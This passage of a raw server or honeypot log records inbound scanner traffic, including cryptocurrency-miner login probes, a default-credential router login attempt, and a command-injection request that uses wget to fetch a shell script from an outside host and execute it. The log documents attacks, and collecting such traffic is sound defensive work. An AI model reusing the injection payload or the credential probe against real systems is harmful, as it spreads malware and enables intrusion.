"48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD", "pass": "x", "agent": "XMRig/2.6.0-beta2 (Linux x86_64) libuv/1.8.0 gcc/5.4.0"}} [2025-01-02 23:01:47] Sending 404: 1, [2025-01-02 23:01:51] Connection from: ('164.52.24.188', 46623) [2025-01-02 23:01:54] Connection from: ('164.52.24.188', 55439) [2025-01-02 23:01:54] {"id": 1, "method": "eth_submitLogin", "params": []} [2025-01-02 23:01:54] Sending 404: 1, [2025-01-02 23:01:57] Connection from: ('164.52.24.188', 59521) [2025-01-02 23:02:00] Connection from: ('164.52.24.188', 51323) [2025-01-02 23:02:00] {"id": 1, "method": "mining.subscribe", "params": ["EthereumStratum/1.0.0"]} [2025-01-02 23:02:00] Sending 404: 1, [2025-01-02 23:02:03] Connection from: ('164.52.24.188', 44523) [2025-01-02 23:02:06] Connection from: ('164.52.24.188', 49379) [2025-01-02 23:02:06] {"id": 1, "method": "mining.hello", "params": {"agent":"ethminer-0.17","host":"76.169.26.194", "port":"50","proto":"EthereumStratum/2.0.0"}} [2025-01-02 23:02:06] Sending 404: 1, [2025-01-02 23:02:34] Connection from: ('164.52.24.188', 60481) [2025-01-02 23:02:34]  [2025-01-02 23:03:09] Connection from: ('164.52.24.188', 33379) [2025-01-02 23:03:39] Connection from: ('164.52.24.188', 52153) [2025-01-02 23:04:06] Connection from: ('164.52.24.188', 48427) [2025-01-02 23:07:03] Connection from: ('195.3.223.55', 52322) [2025-01-02 23:07:03] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 23:26:57] Connection from: ('91.224.92.18', 53604) [2025-01-02 23:26:57] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 Host: 76.169.26.194:80 Connection: keep-alive Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 [2025-01-02 23:26:57] Sending 404: shell [2025-01-02 23:29:35] Connection from: ('43.131.39.179', 34346) [2025-01-02 23:29:35] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 23:31:19] Connection from: ('179.43.191.146', 60782) [2025-01-02 23:31:19] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194 [2025-01-02 23:34:42] Connection from: ('175.107.0.6', 29289) [2025-01-02 23:34:42] GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0 [2025-01-02 23:34:42] Sending 404: boaform/admin/formLogin [2025-01-02 23:39:08] Connection from: ('141.98.11.155', 45220) [2025-01-02 23:39:08] GET / HTTP/1.1 Host: 76.169.26.194:80